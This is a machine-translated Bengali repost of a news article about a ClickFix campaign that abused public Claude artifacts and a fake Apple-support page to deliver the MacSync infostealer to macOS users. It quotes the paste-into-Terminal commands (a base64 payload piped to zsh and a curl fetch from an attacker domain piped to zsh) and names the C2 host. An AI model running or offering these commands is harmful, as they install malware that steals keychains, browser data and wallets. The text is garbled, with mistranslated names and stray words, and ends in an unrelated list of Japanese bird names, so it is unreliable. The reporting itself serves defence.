ক্লাউড এলএলএম আর্টিফ্যাক্ট অপব্যবহার করা হয়েছে ক্লিকফিক্স আক্রমণে ম্যাক ইনফোস্টেলারদের ঠেলে দিতে

ক্লাউড এলএলএম আর্টিফ্যাক্ট অপব্যবহার করা হয়েছে ক্লিকফিক্স আক্রমণে ম্যাক ইনফোস্টেলারদের ঠেলে দিতে


ক্লাউড এলএলএম আর্টিফ্যাক্ট অপব্যবহার করা হয়েছে ক্লিকফিক্স আক্রমণে ম্যাক ইনফোস্টেলারদের ঠেলে দিতে

হুমকির অভিনেতারা ক্লিকফিক্স প্রচারাভিযানে ক্লাউড আর্টিফ্যাক্ট এবং Google বিজ্ঞাপনের অপব্যবহার করছে যা নির্দিষ্ট প্রশ্নের জন্য অনুসন্ধানকারী macOS ব্যবহারকারীদের কাছে InfoStealer ম্যালওয়্যার সরবরাহ করে।

বন্য অঞ্চলে দূষিত কার্যকলাপের কমপক্ষে দুটি রূপ পরিলক্ষিত হয়েছে এবং 10,000 টিরও বেশি ব্যবহারকারী বিপজ্জনক নির্দেশাবলী সম্বলিত সামগ্রী অ্যাক্সেস করেছে৷

ক্লাউড আর্টিফ্যাক্টগুলি হল Entropique এর LLM থেকে তৈরি বিষয়বস্তু যা লেখক সর্বজনীন করেছেন। এটি নির্দেশাবলী, নির্দেশিকা, কোড স্নিপেট বা অন্যান্য ধরণের আউটপুট হতে পারে যা মূল চ্যাট থেকে আলাদা এবং claude.ai ডোমেনে হোস্ট করা একটি লিঙ্কের মাধ্যমে যে কেউ অ্যাক্সেসযোগ্য।

জ্ঞানী

একটি আর্টিফ্যাক্টের পৃষ্ঠা ব্যবহারকারীদের সতর্ক করে যে দেখানো বিষয়বস্তু ব্যবহারকারী দ্বারা তৈরি করা হয়েছে এবং সঠিকতার জন্য যাচাই করা হয়নি।

MacPaw-এর তদন্ত বিভাগ, মুনলক ল্যাবস এবং অ্যাড-ব্লকিং কোম্পানি অ্যাডগার্ডের গবেষকরা “অনলাইন ডিএনএস সমাধানকারী,” “ম্যাকোস সিএলআই ডিস্ক স্পেস বিশ্লেষক” এবং “হোমব্রু” এর মতো বিভিন্ন প্রশ্নের জন্য দূষিত অনুসন্ধানের ফলাফলগুলি দেখেছেন।

ক্ষতিকারক হোমব্রু অনুসন্ধান ফলাফল
ক্ষতিকারক হোমব্রু অনুসন্ধান ফলাফল
সূত্র: এডগার্ড

Google অনুসন্ধানে প্রচারিত ক্ষতিকারক ফলাফলগুলি হয় একটি পাবলিক ক্লাউড আর্টিফ্যাক্ট বা Apple সমর্থনের ছদ্মবেশী একটি মাঝারি নিবন্ধের দিকে পরিচালিত করে৷ উভয় ক্ষেত্রেই, ব্যবহারকারীকে টার্মিনালে শেল কমান্ড পেস্ট করার নির্দেশ দেওয়া হয়।

  • আক্রমণের প্রথম সংস্করণে, কার্যকর করার জন্য দেওয়া কমান্ড হল: ‘echo "..." | base64 -D | zsh,’
  • দ্বিতীয়টিতে থাকাকালীন, এটি হল: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
একটি জাল অ্যাপল সমর্থন পৃষ্ঠা ব্যবহার করে অন্য সংস্করণ
একটি জাল অ্যাপল সমর্থন পৃষ্ঠা ব্যবহার করে অন্য সংস্করণ
সূত্র: মুনলক ল্যাব

মুনলক গবেষকরা খুঁজে পেয়েছেন যে ক্ষতিকারক ক্লাউড গাইডটি ইতিমধ্যে কমপক্ষে 15,600 বার দেখা হয়েছে, যা এই কৌশলটির জন্য কতজন ব্যবহারকারী পড়েছে তার একটি ইঙ্গিত হতে পারে।

AdGuard গবেষকরা কয়েক দিন আগে একই নির্দেশিকা পর্যবেক্ষণ করেছিলেন, যখন এটি 12,300 বার দেখা হয়েছিল।

ক্লাউড কথোপকথনে হোস্ট করা ক্লিক ফিক্স গাইড
ক্লাউড কথোপকথনে হোস্ট করা ক্লিক ফিক্স গাইড
সূত্র: মুনলক ল্যাব

টার্মিনালে কমান্ড চালানোর ফলে MacSync infostealer-এর জন্য একটি ম্যালওয়্যার লোডার পাওয়া যায়, যা সিস্টেমে উপস্থিত সংবেদনশীল তথ্য বের করে।

গবেষকদের মতে, ম্যালওয়্যারটি হার্ডকোডেড টোকেন এবং API কী ব্যবহার করে কমান্ড-এন্ড-কন্ট্রোল (C2) পরিকাঠামোর সাথে যোগাযোগ স্থাপন করে এবং ম্যাকওএস ব্রাউজার ব্যবহারকারী-এজেন্টকে স্বাভাবিক ক্রিয়াকলাপের সাথে মিশে যাওয়ার জন্য স্পুফ করে।

“প্রতিক্রিয়াটি সরাসরি OSScript-এ পাঠানো হয় – AppleScript প্রকৃত চুরি (কিচেন, ব্রাউজার ডেটা, ক্রিপ্টো ওয়ালেট) পরিচালনা করে,” গবেষকরা বলছেন।

চুরি হওয়া ডেটা ‘/tmp/osalogging.zip’-এ একটি সংরক্ষণাগারে প্যাক করা হয় এবং তারপর আক্রমণকারীর C2-এ পাঠানো হয়। a2botnet[.]com/পান HTTP POST অনুরোধের মাধ্যমে। ব্যর্থতার ক্ষেত্রে, সংরক্ষণাগারটি ছোট ছোট টুকরোগুলিতে বিভক্ত করা হয়, এবং অপসারণের জন্য আটবার পুনরায় চেষ্টা করা হয়। সফল আপলোড করার পরে, একটি পরিষ্কার পদক্ষেপ সমস্ত ট্রেস মুছে দেয়।

মুনলক ল্যাব দেখতে পেয়েছে যে উভয় রূপ একই C2 ঠিকানা থেকে উদ্ভূত হয়েছে, যা নির্দেশ করে যে একই হুমকি অভিনেতা পর্যবেক্ষণ করা কার্যকলাপের পিছনে রয়েছে।

একটি অনুরূপ প্রচারাভিযান AMOS InfoStealer বিতরণ করতে ChatGPT এবং Grok-এ চ্যাট শেয়ারিং বৈশিষ্ট্যের সুবিধা নিয়েছে। 2025 সালের ডিসেম্বরে, গবেষকরা আবিষ্কার করেছিলেন যে ম্যাক ব্যবহারকারীদের লক্ষ্য করে ক্লিকফিক্স আক্রমণে ChatGPT এবং Grok কথোপকথন প্রচার করা হচ্ছে।

আক্রমণের ক্লাউড বৈচিত্র ইঙ্গিত করে যে অপব্যবহার অন্যান্য বৃহৎ ভাষার মডেলে (LLMs) ছড়িয়ে পড়েছে।

ব্যবহারকারীদের সতর্কতা অবলম্বন করার এবং টার্মিনাল কমান্ডগুলি কার্যকর করা এড়াতে পরামর্শ দেওয়া হয় যা তারা সম্পূর্ণরূপে বুঝতে পারে না। ক্যাসপারস্কি গবেষকরা যেমন আগে উল্লেখ করেছেন, একই কথোপকথনে চ্যাটবটকে দেওয়া কমান্ডগুলির নিরাপত্তা সম্পর্কে জিজ্ঞাসা করা নিরাপদ কিনা তা নির্ধারণ করার একটি সহজ উপায়।

tines

আধুনিক আইটি অবকাঠামো ম্যানুয়াল ওয়ার্কফ্লোগুলির চেয়ে দ্রুত চলে।

এই নতুন Tynes গাইডে, শিখুন কিভাবে আপনার দল লুকানো ম্যানুয়াল বিলম্ব কমাতে পারে, স্বয়ংক্রিয় প্রতিক্রিয়ার মাধ্যমে নির্ভরযোগ্যতা উন্নত করতে পারে এবং আপনি ইতিমধ্যেই যে সরঞ্জামগুলি ব্যবহার করছেন তার উপরে বুদ্ধিমান ওয়ার্কফ্লোগুলি তৈরি এবং স্কেল করতে পারে৷



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *

ドングリキツツキ エーカーのアリゾナ エイカー・トゥディ・タイラント アダマワキジバト アデレードウグイス アデリーペンギン アドミラルティセミ アフェップ鳩 アフガニスタンのせせらぎ アフガニスタンスノーフィンチ アフリカフクロウ アフリカクロアヒル アフリカクロアマツバメ アフリカアオビタキ アフリカ青シジュウカラ アフリカヒロハシ科 アフリカンシトリル アフリカクビドバト アフリカクイナ アフリカクリムゾンフィンチ アフリカカッコウ アフリカカッコウタカ アフリカンダーター アフリカサバクグイス アフリカキビタキ アフリカドワーフカワセミ アフリカエメラルドカッコー アフリカヒレフット アフリカホタル アフリカウミワシ アフリカゴールデンオリオール オオタカ アフリカグラスフクロウ アフリカアオバト キビタキ アフリカハイイロサイチョウ アフリカハイイロキツツキ アフリカハリアーホーク アフリカオオタカ アフリカンヒルバブラー アフリカの趣味 アフリカヤツガシラ アフリカレンカク アフリカヌマハリアー アフリカのオリーブ鳩 アフリカシロチョウ アフリカミヤコドリ アフリカヤシツバメ アフリカサンコウチョウ アフリカペンギン アフリカンピキュレット アフリカオオサイチョウ アフリカセキレイ アフリカンピピット アフリカのピッタ アフリカピグミーガン アフリカピグミーカワセミ アフリカ鉄道 アフリカヒヨドリ アフリカオオヨシキリ アフリカンリバーマーチン アフリカンロックピピット アフリカクロトキ アフリカコノハズク アフリカモズキビタキ アフリカシルバービル アフリカンスキマー アフリカシギ アフリカヘラサギ アフリカマダラクリーパー アフリカストーンチャット アフリカの沼地 アフリカツグミ アフリカタゲリ アフリカモリフクロウ アフリカキイロウグイス アガミサギ 機敏な暴君 アギグオオヨシキリ アガラスハシブトヒバリ アハンタツメドリ エインリーズウミツバメ アケケエ アキアポラウ アキキキ アコヘコヘ アクンワシミミズク アラゴアスアリモサ アラゴアスキュラソー アラゴアスの落葉落穂拾い アラゴアス ティラヌレット アラオトラカイツブリ アルバーティーンフクロウ アルベルティーンすすのブーブー